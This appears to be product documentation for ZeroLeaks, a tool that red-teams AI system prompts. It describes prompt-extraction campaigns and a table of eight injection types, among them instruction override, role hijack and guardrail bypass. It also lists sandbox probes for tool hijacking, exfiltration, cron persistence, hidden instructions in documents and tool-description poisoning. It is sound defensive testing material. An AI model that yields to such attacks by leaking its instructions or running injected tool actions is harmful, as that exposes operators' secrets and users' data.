Scan Types
ZeroLeaks offers three scan types: Full (extraction and injection), Extraction Only, and Injection Only. All scans run in sandbox mode with full tool execution testing.
Every ZeroLeaks scan runs in sandbox mode: an isolated environment with real tool execution, canary tokens, and kill chain detection. You choose which attack surface to test by selecting a scan type.
Full (Recommended)
Purpose: Run both extraction and injection tests in a single scan. This is the default.
What it tests:
- Extraction: Up to 30 adaptive turns using TAP (Tree of Attacks with Pruning) to extract the system prompt. The Strategist selects attack categories, the Attacker generates probes, the Evaluator analyzes responses for leakage, and the Mutator refines attacks based on feedback.
- Injection: 23 probes across 8 injection types to test whether the model can be made to follow attacker-injected instructions.
- Tool execution: If your prompt defines tools (or they are auto-detected), sandbox probes test tool hijacking, indirect injection via documents, authority spoofing, multi-turn grooming, and protocol exploits.
The final score is the average of the extraction and injection scores. The vulnerability level is the more severe of the two.
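As a rough illustration of that aggregation rule, the sketch below averages two scores and keeps the more severe level. The level names, their ordering, and the dictionary shape are assumptions made for the example and are not taken from ZeroLeaks itself.

```python
# Hypothetical severity ordering, least to most severe; the real level names may differ.
LEVELS = ["secure", "low", "medium", "high", "critical"]

def combine_results(extraction, injection):
    """Combine two per-surface results into one Full-scan result.

    Each argument is a dict with a numeric "score" and a "level" drawn from LEVELS.
    """
    final_score = (extraction["score"] + injection["score"]) / 2
    # max() with LEVELS.index as the key picks the level furthest along the ordering
    worst_level = max(extraction["level"], injection["level"], key=LEVELS.index)
    return {"score": final_score, "level": worst_level}

result = combine_results(
    {"score": 80, "level": "low"},
    {"score": 50, "level": "high"},
)
print(result)
```

Under these assumptions, one weak surface sets the overall level even when the averaged score still looks moderate.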
Best for: Most use cases. Gives complete coverage in a single scan.
Duration: ~8-20 minutes.
Extraction Only
Purpose: Test whether your system prompt can be leaked or extracted through adversarial conversation.
What it tests: The scan engine runs up to 30 adaptive turns with category rotation across 19 attack types (direct, encoding, persona, social, technical, crescendo, many-shot, CoT hijack, policy puppetry, ASCII art, and more). Conversation resets occur automatically when the target becomes defensive.
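The turn budget, category rotation, and automatic resets can be pictured with a simplified loop. This is a plain round-robin sketch, not the TAP-based engine; the `send`, `looks_defensive`, and `leaked` callables, the toy target, and the five-category subset are all hypothetical stand-ins.

```python
from itertools import cycle

MAX_TURNS = 30  # the text states "up to 30 adaptive turns"
CATEGORIES = ["direct", "encoding", "persona", "social", "technical"]  # subset of the 19 types

def run_extraction(send, looks_defensive, leaked, max_turns=MAX_TURNS):
    """Rotate through attack categories, resetting the conversation on defensive replies.

    send(history, category) -> reply text   (hypothetical target interface)
    looks_defensive(reply) -> bool          (hypothetical heuristic)
    leaked(reply) -> bool                   (hypothetical leak check)
    """
    history, resets = [], 0
    for turn, category in zip(range(1, max_turns + 1), cycle(CATEGORIES)):
        reply = send(history, category)
        if leaked(reply):
            return {"leaked": True, "turn": turn, "category": category, "resets": resets}
        if looks_defensive(reply):
            history, resets = [], resets + 1  # start a fresh conversation
        else:
            history.append((category, reply))
    return {"leaked": False, "turn": max_turns, "category": None, "resets": resets}

def toy_target(history, category):
    """Toy stand-in for a model: refuses encoding tricks, leaks on persona attacks."""
    if category == "persona":
        return "SYSTEM PROMPT: you are a helpful bot"
    if category == "encoding":
        return "I can't share that."
    return "How can I help?"

result = run_extraction(
    toy_target,
    looks_defensive=lambda reply: "can't" in reply,
    leaked=lambda reply: "SYSTEM PROMPT" in reply,
)
print(result)
```

A real engine would choose the next category from feedback rather than in fixed order; the fixed rotation only keeps the example short.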
Best for: Prompts where confidentiality of instructions is critical (proprietary logic, safety rules, API keys embedded in prompts).
Duration: ~5-15 minutes.
Injection Only
Purpose: Test whether the model can be made to follow attacker-injected instructions instead of your system prompt.
What it tests: 23 probes across 8 injection types:
| Type | Description |
|---|---|
| Instruction Override | Override system instructions directly |
| Behavior Modification | Change model behavior patterns |
| Policy Bypass | Bypass safety policies |
| Role Hijack | Force the model to adopt a new persona |
| Output Manipulation | Control output format or content |
| Action Execution | Execute unauthorized actions (agentic contexts) |
| Context Poisoning | Poison conversation context or memory |
| Guardrail Bypass | Bypass specific guardrails |
Each probe is evaluated for full compliance, partial compliance, or resistance.
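One way to picture the three-way verdict is a small tally over per-probe results. The `Outcome` enum, the `(injection_type, outcome)` pair format, and the sample data are assumptions for illustration; the actual report format is not described here.

```python
from collections import Counter
from enum import Enum

class Outcome(Enum):
    FULL_COMPLIANCE = "full compliance"
    PARTIAL_COMPLIANCE = "partial compliance"
    RESISTANCE = "resistance"

def summarize(results):
    """Summarize a list of (injection_type, Outcome) pairs, one pair per probe."""
    by_outcome = Counter(outcome for _, outcome in results)
    # Injection types where at least one probe was not fully resisted
    affected = sorted({t for t, outcome in results if outcome is not Outcome.RESISTANCE})
    return by_outcome, affected

# Made-up sample verdicts, not real scan output
results = [
    ("Role Hijack", Outcome.RESISTANCE),
    ("Policy Bypass", Outcome.PARTIAL_COMPLIANCE),
    ("Instruction Override", Outcome.FULL_COMPLIANCE),
    ("Role Hijack", Outcome.RESISTANCE),
]
counts, affected = summarize(results)
print(counts[Outcome.RESISTANCE], affected)
```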
Best for: Prompts where behavioral integrity matters (agents, assistants that must refuse harmful requests, systems processing untrusted input).
Duration: ~3-8 minutes.
Sandbox Capabilities
All scan types include sandbox features when applicable:
- Canary tokens placed in tool definitions to detect data exfiltration
- Kill chain detection for multi-step attacks that chain tool calls
- Tool hijacking probes (SSRF, RCE, curl exfiltration, cron persistence)
- Indirect injection probes (hidden instructions in PDFs, emails, code comments, JSON fields)
- Authority exploitation probes (fake system messages, maintenance windows, compliance threats)
- Protocol exploit probes (MCP shadowing, tool description poisoning, fake extension messages)
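The canary-token idea from the list above can be sketched in a few lines: plant a unique marker in a tool definition, then flag any tool call whose arguments carry it. The helper names, the tool-definition shape, and the tool-call format are hypothetical; how ZeroLeaks places and checks its canaries is not specified here.

```python
import json
import secrets

def make_canary(prefix="CANARY"):
    """Return a unique marker that has no reason to appear anywhere else."""
    return f"{prefix}-{secrets.token_hex(8)}"

def plant_canary(tool_definition, canary):
    """Return a copy of the tool definition with the canary appended to its description."""
    planted = dict(tool_definition)
    planted["description"] = f'{tool_definition["description"]} [ref: {canary}]'
    return planted

def find_exfiltration(tool_calls, canary):
    """Return the tool calls whose serialized arguments contain the canary."""
    return [call for call in tool_calls if canary in json.dumps(call["arguments"])]

canary = make_canary()
tool = plant_canary({"name": "send_email", "description": "Send an email."}, canary)

# Hypothetical tool calls observed during a probe
calls = [
    {"name": "send_email", "arguments": {"to": "a@example.com", "body": "hi"}},
    {"name": "http_get", "arguments": {"url": f"https://attacker.example/?d={canary}"}},
]
flagged = find_exfiltration(calls, canary)
print([call["name"] for call in flagged])
```

Because the marker is random, a substring match is enough to show that text from the tool definition reached an outbound call.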
If you provide tool definitions in the advanced settings, additional dynamic probes are generated based on your specific tools (e.g., email abuse for email tools, SQL injection for database tools).
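A minimal sketch of how tool-specific probes might be chosen, assuming simple keyword matching on tool names and descriptions. Only the email and database pairings come from the text; the keywords, the `PROBE_RULES` table, and the matching strategy are illustrative guesses.

```python
# Hypothetical keyword-to-probe mapping; only the two pairings are named in the text.
PROBE_RULES = {
    "email abuse": ("email", "mail", "smtp"),
    "SQL injection": ("sql", "database", "query"),
}

def select_probes(tools):
    """Return the probe families whose keywords appear in any tool name or description."""
    selected = []
    for probe, keywords in PROBE_RULES.items():
        for tool in tools:
            text = f'{tool["name"]} {tool.get("description", "")}'.lower()
            if any(keyword in text for keyword in keywords):
                selected.append(probe)
                break  # one matching tool is enough for this probe family
    return selected

tools = [
    {"name": "send_email", "description": "Send a message to a customer"},
    {"name": "run_query", "description": "Query the orders database"},
]
print(select_probes(tools))
```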